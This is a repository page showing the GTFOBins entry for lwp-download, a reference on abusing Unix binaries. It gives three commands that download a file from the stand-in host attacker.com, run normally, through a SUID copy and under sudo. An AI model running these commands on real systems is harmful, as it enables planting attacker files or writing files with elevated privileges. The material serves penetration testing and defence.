This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
9cd6849b8ec749e5b4fc9301b0229412682fd411
GTFOBins.github.io
/
_gtfobins
/
lwp-download.md
Andrea Cardaci
9cd6849b8e
Remove useless instances of sudo -E
2020-06-10 22:53:45 +02:00
475 B
Raw
Blame
History
description, functions
description
functions
Fetch a remote file via HTTP GET request.
file-download
suid
sudo
code
URL=
http://attacker.com/file_to_get
LFILE=file_to_save lwp-download $URL $LFILE
code
URL=
http://attacker.com/file_to_get
LFILE=file_to_save ./lwp-download $URL $LFILE
code
URL=
http://attacker.com/file_to_get
export LFILE=file_to_save sudo lwp-download $URL $LFILE
Reference in New Issue
View Git Blame
Copy Permalink